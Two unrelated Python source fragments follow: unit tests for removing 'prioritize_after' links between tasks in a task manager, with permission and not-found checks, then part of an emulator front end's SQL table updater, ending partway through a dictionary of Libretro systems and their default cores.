        self.assertIsNone(self.pl.get_task(missing_id))

    def test_remove_prioritize_after_removes_prioritize_after(self):
        """Removing an existing prioritize_after link clears both sides."""
        # given: t1 is prioritized after t2
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

        # when
        results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
                                                               user)

        # then: no links remain in either direction
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_prioritize_after_already_removed_still_succeeds(self):
        """Removing a link that is not present still reports success."""
        # given: two tasks that share a user but have no links
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        for obj in (t1, t2, user):
            self.pl.add(obj)
        self.pl.commit()

        def assert_no_links():
            for task in (t1, t2):
                self.assertEqual(0, len(task.prioritize_before))
                self.assertEqual(0, len(task.prioritize_after))

        # precondition
        assert_no_links()

        # when
        results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
                                                               user)

        # then: still no links, and the call reports success
        assert_no_links()
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_remove_prioritize_after_with_null_ids_raises_exception(self):
        """Passing None for either id to the remove call raises ValueError
        and leaves the link untouched."""
        # given: an existing prioritize_after link
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

        # expect: every combination involving a None id is rejected
        for task_id, after_id in ((None, t2.id), (t1.id, None), (None, None)):
            self.assertRaises(ValueError,
                              self.ll.do_remove_prioritize_after_from_task,
                              task_id, after_id, user)

        # then: the link is unchanged
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

    def test_remove_prioritize_after_with_null_user_raises_exception(self):
        """Passing None as the user to the remove call raises ValueError
        and leaves the link untouched."""
        # given: an existing prioritize_after link
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t2.id, None)

        # then: the link is unchanged
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

    def test_rem_prioritize_after_user_unauthd_for_task_raises_exception(self):
        """A user not authorized on the source task cannot remove the link."""
        # given: user is only attached to t2; t1 is prioritized after t2
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t2.id, user)

        # then: the link is unchanged
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

    def test_remove_user_not_authd_for_prioritize_after_raises_exception(self):
        """A user not authorized for the prioritize-after task must get
        Forbidden, and the prioritize links must survive intact."""
        # given: user is authorized for the first task only
        task = self.pl.create_task('t1')
        other = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        task.users.append(user)
        task.prioritize_after.append(other)
        for obj in (task, other, user):
            self.pl.add(obj)
        self.pl.commit()
        # NOTE: this situation shouldn't arise in practice — tasks are only
        # supposed to be linked when they share at least one authorized user.

        def assert_links_unchanged():
            self.assertEqual(len(task.prioritize_before), 0)
            self.assertEqual(len(task.prioritize_after), 1)
            self.assertEqual(len(other.prioritize_before), 1)
            self.assertEqual(len(other.prioritize_after), 0)
            self.assertIn(other, task.prioritize_after)
            self.assertIn(task, other.prioritize_before)

        # precondition
        assert_links_unchanged()

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_after_from_task,
                          task.id, other.id, user)

        # then: nothing was removed
        assert_links_unchanged()

    def test_remove_prioritize_after_task_not_found_raises_exception(self):
        """A non-existent task id must raise NotFound and change nothing."""
        # given: a single task with an authorized user
        task = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        task.users.append(user)
        self.pl.add(task)
        self.pl.add(user)
        self.pl.commit()

        missing_id = task.id + 1

        def assert_unchanged():
            self.assertEqual(len(task.prioritize_before), 0)
            self.assertEqual(len(task.prioritize_after), 0)
            self.assertIsNone(self.pl.get_task(missing_id))

        # precondition
        assert_unchanged()

        # expect: the (missing) task id is the one being operated on
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_after_from_task,
                          missing_id, task.id, user)

        # then
        assert_unchanged()

    def test_remove_prioritize_after_when_not_found_raises_exception(self):
        """A non-existent prioritize-after id must raise NotFound and change
        nothing."""
        # given: a single task with an authorized user
        task = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        task.users.append(user)
        self.pl.add(task)
        self.pl.add(user)
        self.pl.commit()

        missing_id = task.id + 1

        def assert_unchanged():
            self.assertEqual(len(task.prioritize_before), 0)
            self.assertEqual(len(task.prioritize_after), 0)
            self.assertIsNone(self.pl.get_task(missing_id))

        # precondition
        assert_unchanged()

        # expect: the (missing) id is the prioritize-after task
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_after_from_task,
                          task.id, missing_id, user)

        # then
        assert_unchanged()

import os

from collections import OrderedDict

from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo

# Root class that all SQL table updaters derive from
class SqlTableUpdater():

    def __init__(self, tableName, tableColumns=[], coreInfo={}):
        self.tableName = tableName
        self.columnsDict = OrderedDict(tableColumns)
        self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
        self.dbFileExists = os.path.isfile(self.dbFile)
        self.coreInfo = coreInfo

        # self.filterUnusedCores()

    def updateTable(self):
        pass

    def updateColumns(self, database, additionalStatement: str = ""):

        if not self.dbFileExists:
            database.createTable(self.tableName, self.columnsDict, additionalStatement)
        else:
            try:
                database.deleteTable(self.tableName)
            except:
                database.createTable(self.tableName, self.columnsDict, additionalStatement)

    def __del__(self):
        print("Updated " + self.tableName + " table.")

    def libretroSystemList(self):
        systems = []
        for k, v in self.coreInfo['cores'].items():

            if "categories" not in v or v["categories"] != "Emulator":
                continue

            if "database" in v:
                name = v["database"].split("|")

                for n in name:
                    systems.append(n)

                    # Split console and manufacturer names
                    # Not really necessary for Libretro identifiers
                    #tup = n.split(" - ")
                    #
                    ## "MAME"
                    #if len(tup) == 1:
                    #    systems.append(tup[0])
                    #
                    ## Nearly every one
                    #elif len(tup) == 2:
                    #    systems.append(tup[1])
                    #
                    ## Sega - Master System - Mark III
                    ## Sega - Mega Drive - Genesis
                    #elif len(tup) == 3:
                    #    systems.append(tup[1])

            # There are some cores that do not have "database" defined
            elif "systemname" in v:
                systems.append(v["systemname"])

        systems = list(set(systems))
        systems.sort()
        return systems

    # This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
    # TODO: Place this information into an entirely separate database
    # WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
    phoenixSystemDatabase = {
    # friendlyName: North American console name without manufacturer
    # shortName: Abbreviation (typically 3 letters)
    # enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)

        # Everything else
        "Arcade":                                           {"enabled": False, "defaultCore": "mame_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },

        # Conspicuously missing from No-Intro
        "Amstrad - CPC":                                    {"enabled": False, "defaultCore": "cap32_libretro",                     "friendlyName": "",                    "shortName": "", "manufacturer": "Amstrad"         },
        "Atari - 2600":                                     {"enabled": True,  "defaultCore": "stella_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Capcom - CP System I":                             {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CP System II":                            {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CP System III":                           {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro",          "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CPS Changer":                             {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "CHIP-8":                                           {"enabled": False, "defaultCore": "emux_chip8_libretro",                "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "DOS":                                              {"enabled": False, "defaultCore": "dosbox_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "Mattel - Intellivision":                           {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Mattel"          },
        "Nintendo - Game & Watch":                          {"enabled": False, "defaultCore": "gw_libretro",                        "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Sinclair - ZX81":                                  {"enabled": False, "defaultCore": "81_libretro",                        "friendlyName": "",                    "shortName": "", "manufacturer": "Sinclair"        },
        "SNK - Neo Geo":                                    {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },

        # No-Intro, both official and non-official (ROM-based games)
        "Atari - 5200":                                     {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - 7800":                                     {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - Jaguar":                                   {"enabled": True,  "defaultCore": "virtualjaguar_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - Lynx":                                     {"enabled": True,  "defaultCore": "mednafen_lynx_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Atari - ST":                                       {"enabled": True,  "defaultCore": "hatari_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Bandai - WonderSwan Color":                        {"enabled": True,  "defaultCore": "mednafen_wswan_libretro",            "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Bandai - WonderSwan":                              {"enabled": True,  "defaultCore": "mednafen_wswan_libretro",            "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Casio - Loopy":                                    {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Casio"           },
        "Casio - PV-1000":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Casio"           },
        "Coleco - ColecoVision":                            {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Coleco"          },
        #"Commodore - 64 (PP)":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        #"Commodore - 64 (Tapes)":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - 64":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga":                                {"enabled": True,  "defaultCore": "puae_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Plus-4":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - VIC-20":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Emerson - Arcadia 2001":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Emerson"         },
        "Entex - Adventure Vision":                         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Entex"           },
        "Epoch - Super Cassette Vision":                    {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Epoch"           },
        "Fairchild - Channel F":                            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Fairchild"       },
        "Funtech - Super Acan":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Funtech"         },
        "GamePark - GP32":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "GamePark"        },
        "GCE - Vectrex":                                    {"enabled": True,  "defaultCore": "vecx_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "GCE"             },
        "Hartung - Game Master":                            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Hartung"         },
        "LeapFrog - Leapster Learning Game System":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "LeapFrog"        },
        "Magnavox - Odyssey2":                              {"enabled": False, "defaultCore": "o2em_libretro",                      "friendlyName": u"Odyssey²",           "shortName": "", "manufacturer": "Magnavox"        },
        "Microsoft - MSX 2":                                {"enabled": False, "defaultCore": "bluemsx_libretro",                   "friendlyName": "MSX2",                "shortName": "", "manufacturer": "Microsoft"       },
        "Microsoft - MSX":                                  {"enabled": False, "defaultCore": "bluemsx_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (DLC)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (Games on Demand)":          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        #"Microsoft - XBOX 360 (Title Updates)":            {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "NEC - PC Engine - TurboGrafx 16":                  {"enabled": True,  "defaultCore": "mednafen_pce_fast_libretro",         "friendlyName": "TurboGrafx 16",       "shortName": "", "manufacturer": "NEC"             },
        "NEC - Super Grafx":                                {"enabled": True,  "defaultCore": "mednafen_supergrafx_libretro",       "friendlyName": "SuperGrafx",          "shortName": "", "manufacturer": "NEC"             },
        #"Nintendo - Famicom Disk System":                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Advance (e-Cards)":            {"enabled": True,  "defaultCore": "vbam_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Advance":                      {"enabled": True,  "defaultCore": "vbam_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy Color":                        {"enabled": True,  "defaultCore": "gambatte_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Game Boy":                              {"enabled": True,  "defaultCore": "gambatte_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - New Nintendo 3DS (DLC)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - New Nintendo 3DS":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo 3DS (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo 3DS":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo 64":                           {"enabled": True,  "defaultCore": "mupen64plus_libretro",               "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo DS (Download Play) (BETA)":   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo DS":                           {"enabled": True,  "defaultCore": "desmume_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo DSi (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo DSi":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Nintendo Entertainment System":         {"enabled": True,  "defaultCore": "fceumm_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        #"Nintendo - Nintendo Wii (DLC)":                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Pokemon Mini":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Satellaview":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Sufami Turbo":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Super Nintendo Entertainment System":   {"enabled": True,  "defaultCore": "bsnes_mercury_balanced_libretro",    "friendlyName": "Super Nintendo",      "shortName": "", "manufacturer": "Nintendo"        },
        "Nintendo - Virtual Boy":                           {"enabled": True,  "defaultCore": "mednafen_vb_libretro",               "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Nokia - N-Gage":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nokia"           },
        "Philips - Videopac+":                              {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Philips"         },
        "RCA - Studio II":                                  {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "RCA"             },
        "Sega - 32X":                                       {"enabled": True,  "defaultCore": "picodrive_libretro",                 "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Game Gear":                                 {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Master System - Mark III":                  {"enabled": False, "defaultCore": "emux_sms_libretro",                  "friendlyName": "Master System",       "shortName": "", "manufacturer": "Sega"            },
        "Sega - Mega Drive - Genesis":                      {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "Genesis",             "shortName": "", "manufacturer": "Sega"            },
        "Sega - PICO":                                      {"enabled": True,  "defaultCore": "picodrive_libretro",                 "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - SG-1000":                                   {"enabled": True,  "defaultCore": "genesis_plus_gx_libretro",           "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sinclair - ZX Spectrum +3":                        {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sinclair"        },
        "SNK - Neo Geo Pocket Color":                       {"enabled": True,  "defaultCore": "mednafen_ngp_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        "SNK - Neo Geo Pocket":                             {"enabled": True,  "defaultCore": "mednafen_ngp_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        #"Sony - PlayStation 3 (DLC)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation 3 (Downloadable)":             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation 3 (PSN)":                      {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (DLC)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (PSN)":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (PSX2PSP)":           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (UMD Music)":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        #"Sony - PlayStation Portable (UMD Video)":         {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Sony - PlayStation Portable":                      {"enabled": True,  "defaultCore": "ppsspp_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Tiger - Game.com":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Tiger"           },
        "Tiger - Gizmondo":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Tiger"           },
        "VTech - CreatiVision":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },
        "VTech - V.Smile":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },
        "Watara - Supervision":                             {"enabled": True,  "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Watara"          },

        # Redump.org (disc-based games)
        "Apple - Macintosh":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Apple"           },
        "Bandai - Playdia":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai"          },
        "Bandai / Apple - Pippin":                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Bandai / Apple"  },
        "Commodore - Amiga CD":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga CD32":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Commodore - Amiga CDTV":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Commodore"       },
        "Fujitsu - FM Towns series":                        {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Fujitsu"         },
        "IBM PC compatible":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "PC",                  "shortName": "", "manufacturer": "(Various)"       },
        "Mattel - HyperScan":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Mattel"          },
        "Microsoft - Xbox":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Namco / Sega / Nintendo - Triforce":               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "NEC - PC Engine CD - TurboGrafx-CD":               {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "TurboGrafx-CD",       "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-88 series":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-98 series":                               {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "NEC - PC-FX - PC-FXGA":                            {"enabled": False, "defaultCore": "mednafen_pcfx_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "NEC"             },
        "Nintendo - GameCube":                              {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Palm OS":                                          {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Palm"            },
        "Panasonic - 3DO Interactive Multiplayer":          {"enabled": False, "defaultCore": "4do_libretro",                       "friendlyName": "",                    "shortName": "", "manufacturer": "Panasonic"       },
        "Philips - CD-i":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Philips"         },
        "Photo - CD":                                       {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "Sega - Chihiro":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Dreamcast":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Lindbergh":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Mega-CD":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Naomi":                                     {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "Sega - Saturn":                                    {"enabled": True,  "defaultCore": "yabause_libretro",                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sega"            },
        "SNK - Neo Geo CD":                                 {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "SNK"             },
        "Sony - PlayStation 2":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "Sony - PlayStation":                               {"enabled": True,  "defaultCore": "mednafen_psx_libretro",              "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        "VTech - V.Flash":                                  {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "VTech"           },

        # Seventh-generation consoles (circa 2005)
        "Microsoft - Xbox 360":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Nintendo - Wii":                                   {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Sony - PlayStation 3":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },

        # Eighth-generation consoles (circa 2012)
        "Microsoft - Xbox One":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
        "Nintendo - Wii U":                                 {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
        "Sony - PlayStation 4":                             {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Sony"            },
        
        # Ninth-generation consoles (circa 2017)
        "Microsoft - Xbox One X":                           {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Microsoft"       },
